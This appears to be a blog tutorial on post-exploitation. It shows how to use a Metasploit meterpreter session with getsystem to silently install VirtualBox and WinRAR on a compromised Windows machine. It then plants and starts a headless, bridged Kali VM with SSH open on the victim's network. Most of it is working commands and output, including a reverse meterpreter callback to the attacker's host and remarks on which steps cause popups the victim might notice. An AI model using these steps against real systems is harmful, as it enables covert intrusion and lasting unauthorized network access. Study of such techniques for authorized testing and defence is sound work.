upload any OS and install on a compromised remote machine

The required tools below are all for windows, but there is no reason why you could not create this in Linux.

Virtualbox https://www.virtualbox.org/wiki/Downloads

Kali (Opt for 32 bit VB image) https://www.offensive-security.com/kali-linux-vmware-arm-image-download/

Winrar http://www.rarlab.com/download.htm

Install Virtualbox on your own PC, download kali 32bit ova from the link above and import it, start it and login. Set up SSH login. There are loads of sites that detail this I used http://www.drchaos.com/enable-ssh-on-kali-linux/

Below is the required configuration to install openssh-server as found listed on drchaos.com

apt-get install openssh-server

update-rc.d -f ssh remove

update-rc.d -f ssh defaults

cd /etc/ssh/

mkdir insecure_original_default_kali_keys

mv ssh_host_* insecure_original_default_kali_keys/

dpkg-reconfigure openssh-server

Create any other changes you wish and then power it off and export it as a .ova The export tends to be placed in either directory location (C:\Users\Your-Name\AppData\Local\VirtualStore\Program Files\Oracle\VirtualBox – or mydocuments)

Using winrar right click on the exported .OVA file and select ‘Add to Archive’ Under the General tab select ‘Split to volume, size’ and choose 100 MB press OK. You need to do this because meterpreter upload seems to have a limit and fails with large files. Reading into this it looks to be partially a ruby problem with suggested fixes of increasing the ram to twice the size of the file you’re uploading. I have tried this with 8GB of ram on the machine I was using and it still failed, so just chop up the file, quick fix!

Get your meterpreter shell, getsystem then start uploading the files. You need to upload your Virtualbox install .exe it’s only a bit over 100mb and uploads fine.

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/VirtualBox-5.0.0-101573-Win.exe" "C:\\Program Files"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/VirtualBox-5.0.0-101573-Win.exe -> C:\Program Files

[*] uploaded   : /root/Desktop/Link to sf_VB_Share/VB/VirtualBox-5.0.0-101573-Win.exe -> C:\Program Files\VirtualBox-5.0.0-101573-Win.exe

meterpreter > shell

Process 2504 created.

Channel 2 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd "C:\\Program Files"

cd "C:\\Program Files"

# Take a look to make sure the upload worked, see below it shows it as 0 in size, to fix this upload it again.

17/08/2015  09:57                 0 VirtualBox-5.0.0-101573-Win.exe

# It should look like the below

17/08/2015  10:13       116,511,944 VirtualBox-5.0.0-101573-Win.exe

# If you try an install a failed upload it will create an alert saying it’s not a 32bit application on the client’s machine.

# To install just complete the following, while the silent option stops any popup during install on the remote machine it does create a shortcut on their desktop once completed.

C:\Program Files>VirtualBox-5.0.0-101573-Win.exe --silent

C:\Program Files>exit

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali.part01.rar" "C:\\Program Files\\Oracle\\VirtualBox"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali.part01.rar -> C:\Program Files\Oracle\VirtualBox

# If you see the below error it is because you have hit the upload size limit. Go back to Winrar and recreate but with reduced size sections.

[-] Error running command upload: NoMemoryError failed to allocate memory

# Below a successful upload

meterpreter > upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar" "C:\\Program Files\\Oracle\\VirtualBox"

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar -> C:\Program Files\Oracle\VirtualBox

[*] uploaded   : /root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar -> C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.part01.rar

# Repeat until all sections have been uploaded, hint copy and paste the above upload command into gedit and paste the line over and over and change the part01 on each line so it corresponds with the file name you want to upload then paste all in one go. Example below keep an eye out for any upload errors while doing this though.

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part01.rar" "C:\\Program Files\\Oracle\\VirtualBox"

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part02.rar" "C:\\Program Files\\Oracle\\VirtualBox"

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part03.rar" "C:\\Program Files\\Oracle\\VirtualBox"

upload "/root/Desktop/Link to sf_VB_Share/VB/Kali_SSH_32BIT/Kali-Linux-1.1.0a-vbox-486.part04.rar" "C:\\Program Files\\Oracle\\VirtualBox"

# Once all sections have been updated then upload WinRar

meterpreter > upload /root/Desktop/Link to sf_VB_Share/VB/wrar53b2.exe -> C:\Program Files\Oracle\VirtualBox

[*] uploading  : /root/Desktop/Link to sf_VB_Share/VB/wrar53b2.exe -> C:\Program Files\Oracle\VirtualBox

[*] uploaded   : /root/Desktop/Link to sf_VB_Share/VB/wrar53b2.exe -> C:\Program Files\Oracle\VirtualBox\wrar53b2.exe

meterpreter > shell

Process 3380 created.

Channel 39 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Program Files\Oracle\VirtualBox\

cd C:\Program Files\Oracle\VirtualBox\

# Take a look to see if all the files have uploaded ok. Then install winrar. This does create a popup during installation on the remote machine.

C:\Program Files\Oracle\VirtualBox>wrar53b2.exe /s

wrar53b2.exe /s

# Now you’re ready to reassemble the uploaded kali parts into one .ova file this creates a winrar progress popup on the clients machine while it is completing this.

C:\Program Files\Oracle\VirtualBox>"C:\Program Files\WinRAR\WinRAR.exe" x "C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.part01.rar"

"C:\Program Files\WinRAR\WinRAR.exe" x "C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.part01.rar"

# If you take a look at the directory (dir) you will now see that the .ova file has been combined into one.

17/08/2015  11:06     3,432,329,216 Kali-Linux-1.1.0a-vbox-486.ova

# Now your ready to use VBoxManage which is the command-line interface to VirtualBox.

# To view what VM are installed

C:\Program Files\Oracle\VirtualBox>VBoxManage list vms

VBoxManage list vms

"Kali-Linux-1.1.0a-vbox-486" {1b4d107c-185c-41b9-a870-68cdc7cf8be4}

"Kali-Linux-1.1.0a-vbox-486_1" {0c3a4399-9b76-4236-acf7-5c00537e84b0}

# To import your VM

VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

C:\Program Files\Oracle\VirtualBox>VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

# If you see this Progress state: VBOX_E_FILE_ERROR while trying to import the VM it is most likely due to WINRAR not compiling all the parts together fully yet as this takes a few minutes. Leave it 5 minutes and retry.

# If you see this error make sure the completed file is still in your directory 1.1.0a-vbox-486.ova' (VERR_FILE_NOT_FOUND)

# Below while importing the VM my session Died at 90% While annoying it respawned and once accessed it was possible to confirm that the VM did import correctly

C:\Program Files\Oracle\VirtualBox>VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

VBoxManage import Kali-Linux-1.1.0a-vbox-486.ova

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%

Interpreting C:\Program Files\Oracle\VirtualBox\Kali-Linux-1.1.0a-vbox-486.ova...

OK.

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...

[*] Sending stage (885806 bytes) to 192.168.0.19

[*] Meterpreter session 3 opened (192.168.0.23:4444 -> 192.168.0.19:49454) at 2015-08-17 07:03:54 -0400

Terminate channel 41? [y/N]  n

Terminate channel 41? [y/N]

[*] 192.168.0.19 - Meterpreter session 2 closed.  Reason: Died

msf exploit(handler) > sessions -i 3

[*] Starting interaction with 3...

meterpreter > shell

Process 3764 created.

Channel 42 created.

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Program Files\Oracle

cd C:\Program Files\Oracle

C:\Program Files\Oracle>VBoxManage list vms

VBoxManage list vms

'VBoxManage' is not recognized as an internal or external command,

operable program or batch file.

C:\Program Files\Oracle>cd C:\Program Files\Oracle\VirtualBox

cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox>VBoxManage list vms

VBoxManage list vms

"Kali-Linux-1.1.0a-vbox-486" {d678687a-6080-4da7-a65b-0119c6864856}

C:\Program Files\Oracle\VirtualBox>

# Once it has imported you need to correctly set up the network card on the VM, you need to be able to identify what network cards the compromised host is using so you can bridge to a chosen one.

C:\Program Files\Oracle\VirtualBox>VBoxManage list bridgedifs

VBoxManage list bridgedifs

Name:            Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)

GUID:            26e61cb1-8cd2-4100-b6ce-b03c09fba448

DHCP:            Enabled

IPAddress:       192.168.0.19

NetworkMask:     255.255.255.0

IPV6Address:     fe80:0000:0000:0000:f806:8c84:b5b4:9890

IPV6NetworkMaskPrefixLength: 64

HardwareAddress: 6c:62:6d:71:95:ba

MediumType:      Ethernet

Status:          Up

VBoxNetworkName: HostInterfaceNetworking-Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)

# Adding the correct network card vendor, if you miss this stage the VM won’t start up.

C:\Program Files\Oracle\VirtualBox>VBoxManage modifyvm Kali-Linux-1.1.0a-vbox-486 --nic1 bridged --bridgeadapter1 "Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)"

VBoxManage modifyvm Kali-Linux-1.1.0a-vbox-486 --nic1 bridged --bridgeadapter1 "Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)"

# To view that the VM has accepted the wireless card vendor information run the view VM option. This shows you a lot of details on the VM below is a cut version of the information.

C:\Program Files\Oracle\VirtualBox>VBoxManage showvminfo Kali-Linux-1.1.0a-vbox-486

Name:            Kali-Linux-1.1.0a-vbox-486

Groups:          /

Guest OS:        Linux 2.6 / 3.x / 4.x (64-bit)

SATA (0, 0): C:\Windows\system32\config\systemprofile\VirtualBox VMs\Kali-Linux-1.1.0a-vbox-486\Kali-Linux-1.1.0a-vbox-486-disk1.vmdk (UUID: 461523fd-4d26-4897-a05e-05daf04409e3)

NIC 1:           MAC: 08002739B2BE, Attachment: Bridged Interface 'Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)', Cable connected: on, Trace: off (file: none), Type: 82540EM, Reported speed: 0 Mbps, Boot priority: 0, Promisc Policy: deny, Bandwidth group: none

# Then you can attempt to start your VM

C:\Program Files\Oracle\VirtualBox>VBoxManage startvm Kali-Linux-1.1.0a-vbox-486 --type headless

VBoxManage startvm Kali-Linux-1.1.0a-vbox-486 --type headless

Waiting for VM "Kali-Linux-1.1.0a-vbox-486" to power on...

VM "Kali-Linux-1.1.0a-vbox-486" has been successfully started.

# This will only work in environments that allocate IP address via DHCP. Following starting up the VM use nmap to scan the connected network for a device that shows SSH open.

root@kali:~# nmap -sS -v --open -p 22 192.168.0.0/24

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-17 07:19 EDT

Initiating ARP Ping Scan at 07:19

Scanning 255 hosts [1 port/host]

Nmap scan report for 192.168.0.24

Host is up (0.0038s latency).

PORT   STATE SERVICE

22/tcp open  ssh

MAC Address: 08:00:27:39:B2:BE (Cadmus Computer Systems)

root@kali:~# ssh root@192.168.0.24

root@192.168.0.24's password:

Linux kali 3.18.0-kali3-586 #1 Debian 3.18.6-1~kali2 (2015-03-02) i686

The programs included with the Kali GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Fri Aug 14 16:22:24 2015 from 192.168.0.20

root@kali:~# uptime

07:22:27 up 4 min,  1 user,  load average: 0.15, 0.50, 0.27

# To power off your VM

C:\Program Files\Oracle\VirtualBox>VBoxManage controlvm Kali-Linux-1.1.0a-vbox-486 poweroff

VBoxManage controlvm Kali-Linux-1.1.0a-vbox-486 poweroff

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%

C:\Program Files\Oracle\VirtualBox>

Virtual Box Headless commands

Import a VM

VBoxManage import Image-Name

To see all imported VM

VBoxManage list vms

To view the physical machines network card details

VBoxManage list bridgedifs

To bridge your VM network card to the physical machines network card

VBoxManage modifyvm Kali-Linux-1.1.0a-vbox-486 --nic1 bridged --bridgeadapter1 "Realtek RTL8168D/8111D Family PCI-E Gigabit Ethernet NIC (NDIS 6.20)"

To start the VM

VBoxManage startvm Kali-Linux-1.1.0a-vbox-486_1 --type headless

To power off the VM

VBoxManage controlvm Kali-Linux-1.1.0a-vbox-486 poweroff

To delete the VM hard drive

VBoxManage modifyvm "VM-Name" -hda none

To delete the VM image

VBoxManage unregistervm "VM-Name" --delete

Advertisements